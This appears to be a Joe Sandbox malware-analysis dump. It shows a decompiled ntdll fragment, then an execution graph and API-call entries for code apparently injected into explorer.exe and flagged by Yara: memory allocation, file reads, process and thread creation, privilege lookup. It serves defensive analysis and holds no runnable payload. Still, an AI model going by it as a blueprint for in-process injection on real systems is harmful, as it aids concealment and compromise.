                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E0346CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E034B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E034B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}










                                  0x034bfdda
                                  0x034bfde2
                                  0x034bfde5
                                  0x034bfdec
                                  0x034bfdfa
                                  0x034bfdff
                                  0x034bfe0a
                                  0x034bfe0f
                                  0x034bfe17
                                  0x034bfe1e
                                  0x034bfe19
                                  0x034bfe19
                                  0x034bfe19
                                  0x034bfe20
                                  0x034bfe21
                                  0x034bfe22
                                  0x034bfe25
                                  0x034bfe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034BFDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034BFE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034BFE2B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 48a28a726b28cf5d7e603c1c7306187084509b6e8ce8f2559e4599d0708144bd
                                  • Instruction ID: 9b3b04eac4a6400fe42b3aed786aea1c19f4fd09ceb43dbbf9a7a1ae7cceeb66
                                  • Opcode Fuzzy Hash: 48a28a726b28cf5d7e603c1c7306187084509b6e8ce8f2559e4599d0708144bd
                                  • Instruction Fuzzy Hash: 61F0C8362006017FDA215E45DC01E67BB6ADB45730F240216F6285D5D1D962B83086B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.9%
                                  Dynamic/Decrypted Code Coverage:3.1%
                                  Signature Coverage:0%
                                  Total number of Nodes:451
                                  Total number of Limit Nodes:62
                                  execution_graph 30706 3359050 30711 335be80 30706->30711 30708 335916c 30709 33590f0 Sleep 30710 335908b 30709->30710 30710->30708 30710->30709 30712 335bead 30711->30712 30714 335a510 30711->30714 30712->30710 30717 335af80 30714->30717 30716 335a52c NtAllocateVirtualMemory 30716->30712 30718 335af8f 30717->30718 30718->30716 30719 335f26d 30722 335ba80 30719->30722 30721 335f272 30723 335baa6 30722->30723 30728 3349170 30723->30728 30725 335bab2 30727 335bad6 30725->30727 30734 3348450 30725->30734 30727->30721 30758 33490c0 30728->30758 30730 3349184 30730->30725 30731 334917d 30731->30730 30765 334d580 30731->30765 30739 3348477 30734->30739 30735 33485f4 30735->30727 30737 3348516 30737->30735 30738 335c0d0 RtlAllocateHeap 30737->30738 30740 334852c 30738->30740 30739->30735 31002 334d780 30739->31002 30741 335c0d0 RtlAllocateHeap 30740->30741 30742 334853d 30741->30742 30743 335c0d0 RtlAllocateHeap 30742->30743 30744 334854e 30743->30744 31012 334b4e0 30744->31012 30746 3348561 30747 33556b0 7 API calls 30746->30747 30748 3348572 30747->30748 30749 33556b0 7 API calls 30748->30749 30750 3348583 30749->30750 30753 334859c 30750->30753 31018 334c050 30750->31018 30752 33556b0 7 API calls 30756 33485ba 30752->30756 30753->30752 30754 33485eb 30753->30754 31022 3348230 30754->31022 30756->30754 31041 334c0f0 NtClose LdrInitializeThunk LdrInitializeThunk 30756->31041 30760 33490d3 30758->30760 30759 33490e6 30759->30731 30760->30759 30773 335b330 30760->30773 30762 3349123 30762->30759 30784 3348ee0 30762->30784 30764 3349143 30764->30731 30766 334d599 30765->30766 30767 3349195 30766->30767 30994 335a7a0 30766->30994 30767->30725 30769 334d5d2 30770 334d5fd 30769->30770 30997 335a230 30769->30997 30772 335a460 NtClose 30770->30772 30772->30767 30774 335b349 30773->30774 30790 33556b0 30774->30790 30776 335b361 30777 335b36a 30776->30777 30819 335b170 30776->30819 30777->30762 30779 335b37e 30779->30777 30832 3359ed0 30779->30832 30973 3347220 30784->30973 30786 3348f01 30786->30764 30787 3348efa 30787->30786 30986 33474e0 30787->30986 30791 33556c4 30790->30791 30793 33557d3 30790->30793 30791->30793 30839 335a330 30791->30839 30793->30776 30794 3355817 30795 335bf00 RtlFreeHeap 30794->30795 30800 3355823 30795->30800 30796 33559a9 30798 335a460 NtClose 30796->30798 30797 33559bf 30888 33553f0 NtReadFile NtClose 30797->30888 30801 33559b0 30798->30801 30800->30793 30800->30796 30800->30797 30803 33558b2 30800->30803 30801->30776 30802 33559d2 30802->30776 30804 3355919 30803->30804 30805 33558c1 30803->30805 30804->30796 30811 335592c 30804->30811 30806 33558c6 30805->30806 30807 33558da 30805->30807 30884 33552b0 NtClose LdrInitializeThunk LdrInitializeThunk 30806->30884 30809 33558f7 30807->30809 30810 33558df 30807->30810 30809->30801 30852 3355070 30809->30852 30842 3355350 30810->30842 30885 335a460 30811->30885 30812 33558d0 30812->30776 30815 33558ed 30815->30776 30816 335590f 30816->30776 30818 3355998 30818->30776 30820 335b18b 30819->30820 30821 335b19d 30820->30821 30822 335be80 NtAllocateVirtualMemory 30820->30822 30821->30779 30823 335b1bd 30822->30823 30904 3354cd0 30823->30904 30825 335b1e0 30825->30821 30826 3354cd0 2 API calls 30825->30826 30828 335b202 30826->30828 30828->30821 30936 3355ff0 30828->30936 30829 335b28a 30947 3359e90 30829->30947 30833 3359eec 30832->30833 30967 55e967a 30833->30967 30834 3359f07 30836 335bf00 30834->30836 30970 335a640 30836->30970 30838 335b3d9 30838->30762 30840 335af80 30839->30840 30841 335a34c NtCreateFile 30840->30841 30841->30794 30843 335536c 30842->30843 30844 3355394 30843->30844 30845 33553a8 30843->30845 30846 335a460 NtClose 30844->30846 30847 335a460 NtClose 30845->30847 30848 335539d 30846->30848 30849 33553b1 30847->30849 30848->30815 30889 335c110 RtlAllocateHeap 30849->30889 30851 33553bc 30851->30815 30853 33550ee 30852->30853 30854 33550bb 30852->30854 30856 335510a 30853->30856 30858 3355239 30853->30858 30855 335a460 NtClose 30854->30855 30857 33550df 30855->30857 30859 3355141 30856->30859 30860 335512c 30856->30860 30857->30816 30866 335a460 NtClose 30858->30866 30861 3355146 30859->30861 30862 335515c 30859->30862 30863 335a460 NtClose 30860->30863 30865 335a460 NtClose 30861->30865 30872 3355161 30862->30872 30890 335c0d0 30862->30890 30864 3355135 30863->30864 30864->30816 30868 335514f 30865->30868 30867 3355299 30866->30867 30867->30816 30868->30816 30869 3355173 30869->30816 30872->30869 30893 335a3e0 30872->30893 30873 33551e5 30876 335a460 NtClose 30873->30876 30874 33551fa 30877 335a460 NtClose 30874->30877 30875 33551c7 30875->30873 30875->30874 30876->30869 30878 3355203 30877->30878 30879 335522f 30878->30879 30896 335bcd0 30878->30896 30879->30816 30881 335521a 30882 335bf00 RtlFreeHeap 30881->30882 30883 3355223 30882->30883 30883->30816 30884->30812 30886 335af80 30885->30886 30887 335a47c NtClose 30886->30887 30887->30818 30888->30802 30889->30851 30901 335a600 30890->30901 30892 335c0e8 30892->30872 30894 335af80 30893->30894 30895 335a3fc NtReadFile 30894->30895 30895->30875 30897 335bcf4 30896->30897 30898 335bcdd 30896->30898 30897->30881 30898->30897 30899 335c0d0 RtlAllocateHeap 30898->30899 30900 335bd0b 30899->30900 30900->30881 30902 335af80 30901->30902 30903 335a61c RtlAllocateHeap 30902->30903 30903->30892 30905 3354ce1 30904->30905 30906 3354ce9 30904->30906 30905->30825 30935 3354fbc 30906->30935 30951 335d0b0 30906->30951 30908 3354d3d 30909 335d0b0 RtlAllocateHeap 30908->30909 30912 3354d48 30909->30912 30910 3354d96 30913 335d0b0 RtlAllocateHeap 30910->30913 30912->30910 30914 335d1e0 2 API calls 30912->30914 30965 335d150 RtlAllocateHeap RtlFreeHeap 30912->30965 30915 3354daa 30913->30915 30914->30912 30916 3354e07 30915->30916 30956 335d1e0 30915->30956 30917 335d0b0 RtlAllocateHeap 30916->30917 30919 3354e1d 30917->30919 30920 3354e5a 30919->30920 30923 335d1e0 2 API calls 30919->30923 30921 335d0b0 RtlAllocateHeap 30920->30921 30922 3354e65 30921->30922 30924 335d1e0 2 API calls 30922->30924 30931 3354e9f 30922->30931 30923->30919 30924->30922 30927 335d110 RtlFreeHeap 30928 3354f9e 30927->30928 30929 335d110 RtlFreeHeap 30928->30929 30930 3354fa8 30929->30930 30932 335d110 RtlFreeHeap 30930->30932 30962 335d110 30931->30962 30933 3354fb2 30932->30933 30934 335d110 RtlFreeHeap 30933->30934 30934->30935 30935->30825 30937 3356001 30936->30937 30938 33556b0 7 API calls 30937->30938 30943 3356017 30938->30943 30939 3356020 30939->30829 30940 3356057 30941 335bf00 RtlFreeHeap 30940->30941 30942 3356068 30941->30942 30942->30829 30943->30939 30943->30940 30944 33560a3 30943->30944 30945 335bf00 RtlFreeHeap 30944->30945 30946 33560a8 30945->30946 30946->30829 30948 3359eac 30947->30948 30966 55e9860 LdrInitializeThunk 30948->30966 30949 3359ec3 30949->30779 30952 335d0c6 30951->30952 30953 335d0c0 30951->30953 30954 335c0d0 RtlAllocateHeap 30952->30954 30953->30908 30955 335d0ec 30954->30955 30955->30908 30957 335d150 30956->30957 30958 335c0d0 RtlAllocateHeap 30957->30958 30959 335d1ad 30957->30959 30960 335d18a 30958->30960 30959->30915 30961 335bf00 RtlFreeHeap 30960->30961 30961->30959 30963 335bf00 RtlFreeHeap 30962->30963 30964 3354f94 30963->30964 30964->30927 30965->30912 30966->30949 30968 55e968f LdrInitializeThunk 30967->30968 30969 55e9681 30967->30969 30968->30834 30969->30834 30971 335a65c RtlFreeHeap 30970->30971 30972 335af80 30970->30972 30971->30838 30972->30971 30974 3347230 30973->30974 30975 334722b 30973->30975 30976 335be80 NtAllocateVirtualMemory 30974->30976 30975->30787 30979 3347255 30976->30979 30977 33472b8 30977->30787 30978 3359e90 LdrInitializeThunk 30978->30979 30979->30977 30979->30978 30980 33472be 30979->30980 30984 335be80 NtAllocateVirtualMemory 30979->30984 30989 335a590 30979->30989 30982 33472e4 30980->30982 30983 335a590 LdrInitializeThunk 30980->30983 30982->30787 30985 33472d5 30983->30985 30984->30979 30985->30787 30987 335a590 LdrInitializeThunk 30986->30987 30988 33474fe 30987->30988 30988->30764 30990 335a5ac 30989->30990 30993 55e96e0 LdrInitializeThunk 30990->30993 30991 335a5c3 30991->30979 30993->30991 30995 335af80 30994->30995 30996 335a7bf LookupPrivilegeValueW 30995->30996 30996->30769 30998 335a24c 30997->30998 31001 55e9910 LdrInitializeThunk 30998->31001 30999 335a26b 30999->30770 31001->30999 31003 334d7ac 31002->31003 31042 334d690 31003->31042 31006 334d7f1 31008 334d802 31006->31008 31011 335a460 NtClose 31006->31011 31007 334d7d9 31009 334d7e4 31007->31009 31010 335a460 NtClose 31007->31010 31008->30737 31009->30737 31010->31009 31011->31008 31013 334b4f6 31012->31013 31015 334b500 31012->31015 31013->30746 31014 334b5a8 31014->30746 31015->31014 31016 33556b0 7 API calls 31015->31016 31017 334b619 31016->31017 31017->30746 31019 334c076 31018->31019 31053 334bd40 31019->31053 31021 334c0dc 31021->30753 31078 334da40 31022->31078 31024 3348243 31037 3348441 31024->31037 31082 3355000 31024->31082 31026 33482a2 31026->31037 31085 3347fe0 31026->31085 31029 335d0b0 RtlAllocateHeap 31030 33482e9 31029->31030 31031 335d1e0 2 API calls 31030->31031 31033 33482fe 31031->31033 31032 3347220 3 API calls 31040 3348350 31032->31040 31033->31040 31134 3343660 9 API calls 31033->31134 31037->30735 31039 33474e0 LdrInitializeThunk 31039->31040 31040->31032 31040->31037 31040->31039 31090 334b210 31040->31090 31130 334d9e0 31040->31130 31135 334d4c0 20 API calls 31040->31135 31041->30754 31043 334d6aa 31042->31043 31047 334d760 31042->31047 31048 3359f50 31043->31048 31046 335a460 NtClose 31046->31047 31047->31006 31047->31007 31049 3359f6c 31048->31049 31052 55e9fe0 LdrInitializeThunk 31049->31052 31050 334d754 31050->31046 31052->31050 31054 334bd57 31053->31054 31059 334da80 31054->31059 31058 334bdcb 31058->31021 31060 334daa5 31059->31060 31070 3347520 31060->31070 31062 334bd9f 31067 335a6b0 31062->31067 31063 33556b0 7 API calls 31065 334dac9 31063->31065 31065->31062 31065->31063 31066 335bf00 RtlFreeHeap 31065->31066 31077 334d8c0 CreateProcessInternalW LdrInitializeThunk 31065->31077 31066->31065 31068 335af80 31067->31068 31069 335a6cf CreateProcessInternalW 31068->31069 31069->31058 31071 334761f 31070->31071 31072 3347535 31070->31072 31071->31065 31072->31071 31073 33556b0 7 API calls 31072->31073 31074 33475a2 31073->31074 31075 335bf00 RtlFreeHeap 31074->31075 31076 33475c9 31074->31076 31075->31076 31076->31065 31077->31065 31079 334da5e 31078->31079 31080 334da66 SetErrorMode 31079->31080 31081 334da6d 31079->31081 31080->31081 31081->31024 31136 334d810 31082->31136 31084 3355026 31084->31026 31086 335be80 NtAllocateVirtualMemory 31085->31086 31089 3348005 31086->31089 31087 3348220 31087->31029 31089->31087 31153 3359850 31089->31153 31091 334b22f 31090->31091 31092 334b229 31090->31092 31197 3348c30 31091->31197 31188 334d2d0 31092->31188 31095 334b23c 31096 335d1e0 2 API calls 31095->31096 31129 334b4d2 31095->31129 31097 334b258 31096->31097 31098 334d9e0 LdrInitializeThunk 31097->31098 31099 334b26c 31097->31099 31098->31099 31100 3359ed0 LdrInitializeThunk 31099->31100 31101 334b3a0 31099->31101 31099->31129 31102 334b2ea 31100->31102 31212 334b1b0 LdrInitializeThunk 31101->31212 31102->31101 31106 334b2f6 31102->31106 31104 334b3bf 31105 334b3c7 31104->31105 31213 334b120 NtClose LdrInitializeThunk 31104->31213 31107 335a460 NtClose 31105->31107 31109 334b349 31106->31109 31112 3359fe0 LdrInitializeThunk 31106->31112 31106->31129 31110 334b3d1 31107->31110 31113 335a460 NtClose 31109->31113 31110->31040 31111 334b3e9 31111->31105 31114 334b3f0 31111->31114 31112->31109 31115 334b366 31113->31115 31116 334b408 31114->31116 31214 334b0a0 LdrInitializeThunk 31114->31214 31203 3359300 31115->31203 31215 334af20 NtClose LdrInitializeThunk LdrInitializeThunk 31116->31215 31119 334b37d 31119->31129 31206 3347690 31119->31206 31123 334b440 31124 335a460 NtClose 31123->31124 31125 334b4a5 31124->31125 31126 335a460 NtClose 31125->31126 31127 334b4af 31126->31127 31128 3347690 2 API calls 31127->31128 31127->31129 31128->31129 31129->31040 31131 334d9f3 31130->31131 31258 3359e60 31131->31258 31134->31040 31135->31040 31137 334d82d 31136->31137 31143 3359f90 31137->31143 31140 334d875 31140->31084 31144 3359fac 31143->31144 31151 55e99a0 LdrInitializeThunk 31144->31151 31145 334d86e 31145->31140 31147 3359fe0 31145->31147 31148 3359ffc 31147->31148 31152 55e9780 LdrInitializeThunk 31148->31152 31149 334d89e 31149->31084 31151->31145 31152->31149 31154 335c0d0 RtlAllocateHeap 31153->31154 31155 3359867 31154->31155 31172 3348770 31155->31172 31157 3359882 31158 33598c0 31157->31158 31159 33598a9 31157->31159 31162 335be80 NtAllocateVirtualMemory 31158->31162 31160 335bf00 RtlFreeHeap 31159->31160 31161 33598b6 31160->31161 31161->31087 31163 33598fa 31162->31163 31164 335be80 NtAllocateVirtualMemory 31163->31164 31165 3359913 31164->31165 31166 3359ba0 31165->31166 31169 3359bb4 31165->31169 31167 335bf00 RtlFreeHeap 31166->31167 31168 3359baa 31167->31168 31168->31087 31170 335bf00 RtlFreeHeap 31169->31170 31171 3359c09 31170->31171 31171->31087 31173 3348795 31172->31173 31175 33487ed 31173->31175 31176 334b950 31173->31176 31175->31157 31177 334b97c 31176->31177 31178 334b99c 31177->31178 31183 335a1f0 31177->31183 31178->31175 31180 334b9bf 31180->31178 31181 335a460 NtClose 31180->31181 31182 334b9fa 31181->31182 31182->31175 31184 335a20c 31183->31184 31187 55e9710 LdrInitializeThunk 31184->31187 31185 335a227 31185->31180 31187->31185 31216 334c3c0 31188->31216 31190 334d2e7 31191 334d300 31190->31191 31223 3344000 31190->31223 31193 335c0d0 RtlAllocateHeap 31191->31193 31195 334d30e 31193->31195 31194 334d2fa 31239 3359180 31194->31239 31195->31091 31198 3348c4b 31197->31198 31199 334d690 2 API calls 31198->31199 31202 3348d61 31198->31202 31200 3348d4c 31199->31200 31201 335a460 NtClose 31200->31201 31200->31202 31201->31202 31202->31095 31204 334d9e0 LdrInitializeThunk 31203->31204 31205 3359332 31204->31205 31205->31119 31207 33476a8 31206->31207 31208 33476dc PostThreadMessageW 31207->31208 31209 334770d 31207->31209 31208->31209 31210 33476f0 31208->31210 31209->31040 31211 33476fa PostThreadMessageW 31210->31211 31211->31209 31212->31104 31213->31111 31214->31116 31215->31123 31217 334c3f3 31216->31217 31218 334d810 2 API calls 31217->31218 31219 334c45d 31218->31219 31220 334c464 31219->31220 31243 335c110 RtlAllocateHeap 31219->31243 31220->31190 31222 334c474 31222->31190 31224 334402c 31223->31224 31225 334b950 2 API calls 31224->31225 31226 3344103 31225->31226 31238 33444ff 31226->31238 31244 334ba10 31226->31244 31230 33443b3 31231 3344479 31230->31231 31232 334ba10 LdrInitializeThunk 31230->31232 31234 335be80 NtAllocateVirtualMemory 31231->31234 31233 3344452 31232->31233 31233->31231 31236 335a0f0 LdrInitializeThunk 31233->31236 31235 33444e6 31234->31235 31237 335be80 NtAllocateVirtualMemory 31235->31237 31236->31231 31237->31238 31238->31194 31240 33591a1 31239->31240 31241 33591c7 31240->31241 31242 33591b4 CreateThread 31240->31242 31241->31191 31242->31191 31243->31222 31245 334ba35 31244->31245 31252 335a060 31245->31252 31248 335a0f0 31249 335a10c 31248->31249 31257 55e9650 LdrInitializeThunk 31249->31257 31250 335a12b 31250->31230 31253 335a07c 31252->31253 31256 55e96d0 LdrInitializeThunk 31253->31256 31254 334438c 31254->31230 31254->31248 31256->31254 31257->31250 31259 3359e6f 31258->31259 31262 55e9840 LdrInitializeThunk 31259->31262 31260 334da1e 31260->31040 31262->31260 31264 55e9540 LdrInitializeThunk

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 568 335a330-335a381 call 335af80 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000005,00000000,03355817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,03355817,00000000,00000005,00000060,00000000,00000000), ref: 0335A37D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                  • Instruction ID: 3cf663e771767e22ef8809e965d982c1350df01f6abc828db7bbed763d698b0f
                                  • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                  • Instruction Fuzzy Hash: 4AF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118248BA0997241D630F8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 565 335a32f-335a346 566 335a34c-335a381 NtCreateFile 565->566 567 335a347 call 335af80 565->567 567->566
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000005,00000000,03355817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,03355817,00000000,00000005,00000060,00000000,00000000), ref: 0335A37D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: f3523d2e63ef70a9307bafd795faa2969a5aa9313d420307be09db5d3dd24c54
                                  • Instruction ID: d84eae874bea5f8a8156f5baf0fe7277424f17fda4bc072b427e2f92268b79c0
                                  • Opcode Fuzzy Hash: f3523d2e63ef70a9307bafd795faa2969a5aa9313d420307be09db5d3dd24c54
                                  • Instruction Fuzzy Hash: CBF0CFB6205208AFCB08CF88DC84EEB37ADAF8C754F018208FA0DD7241C630E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 585 335a3e0-335a429 call 335af80 NtReadFile
                                  APIs
                                  • NtReadFile.NTDLL(033559D2,5DA515B3,FFFFFFFF,03355691,00000206,?,033559D2,00000206,03355691,FFFFFFFF,5DA515B3,033559D2,00000206,00000000), ref: 0335A425
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                  • Instruction ID: 58824059daa9529b74a2c3f217a08c72b0363d7f70c424f3ed59c9f4315d47cd
                                  • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                  • Instruction Fuzzy Hash: 0BF0A4B6200208ABCB14DF99DC84EEB77ADAF8C754F118248BE0D97241D630E811CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03342D11,00002000,00003000,00000004), ref: 0335A549
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 45fc50a779295ff7b91596078ad24a8279a0644ea3257496b90e23fa9db74e62
                                  • Instruction ID: b5f8e9ef9578a9db0f90d2dcebb2b97249d3979a725cf2f42a6b92d337e27547
                                  • Opcode Fuzzy Hash: 45fc50a779295ff7b91596078ad24a8279a0644ea3257496b90e23fa9db74e62
                                  • Instruction Fuzzy Hash: 23F0F8B6210209ABDB14DF99DC81EE777ADAF8C654F018218BE1D97241CA30F811CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(033559B0,00000206,?,033559B0,00000005,FFFFFFFF), ref: 0335A485
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 3574422ddce1b683656f5277acfe4d5642b4d1c3420fbe46134ace03dfbf034d
                                  • Instruction ID: 473f28ed7542f2a490f448b20c7fbce0890dfb09cbf48452960baaf941b6e7d5
                                  • Opcode Fuzzy Hash: 3574422ddce1b683656f5277acfe4d5642b4d1c3420fbe46134ace03dfbf034d
                                  • Instruction Fuzzy Hash: B2F0A0B62001047FDB24DFE8DC84EEB7BA9EF88320F008659F94D9B201C530E910CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03342D11,00002000,00003000,00000004), ref: 0335A549
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                  • Instruction ID: 5cbf829f5b06fbc6401774bce99b0525e4affe5cb7227705b6297efe7cf97492
                                  • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                  • Instruction Fuzzy Hash: 77F015B6210209ABDB14DF89DC80EAB77ADAF8C654F018208FE0897241C630F810CBF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(033559B0,00000206,?,033559B0,00000005,FFFFFFFF), ref: 0335A485
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_3340000_explorer.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                  • Instruction ID: 339c48976bd985f9c5c4f02e425077b2085a5311dff095dec8f0bf45db1f971e
                                  • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                  • Instruction Fuzzy Hash: E5D01776600214ABD620EB98DC89E977BACDF48660F018155BA489B242C530FA1086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2761004eb95f02738bc309f5d24f8d956e2f23719ec108cf351ddce56bb5ee19
                                  • Instruction ID: 1a91d968fbf1310775abda7a303ca556138b39c83ad8e3d9c7e4045a37657ae0
                                  • Opcode Fuzzy Hash: 2761004eb95f02738bc309f5d24f8d956e2f23719ec108cf351ddce56bb5ee19
                                  • Instruction Fuzzy Hash: 33900265251000030105A559074450700A6A7D5395392C021F2005550CDA6188617261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 73d277b35b308447ead599439448038af486ecb5459b58ff54f3dee0393bb431
                                  • Instruction ID: 0f56da315e66bc8a5aca5bae1453141b37ec5d7c6371887650259312e0629e96
                                  • Opcode Fuzzy Hash: 73d277b35b308447ead599439448038af486ecb5459b58ff54f3dee0393bb431
                                  • Instruction Fuzzy Hash: D59002B124100402D140715944447460065A7D0345F92C011A6054554E8A998DD577A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
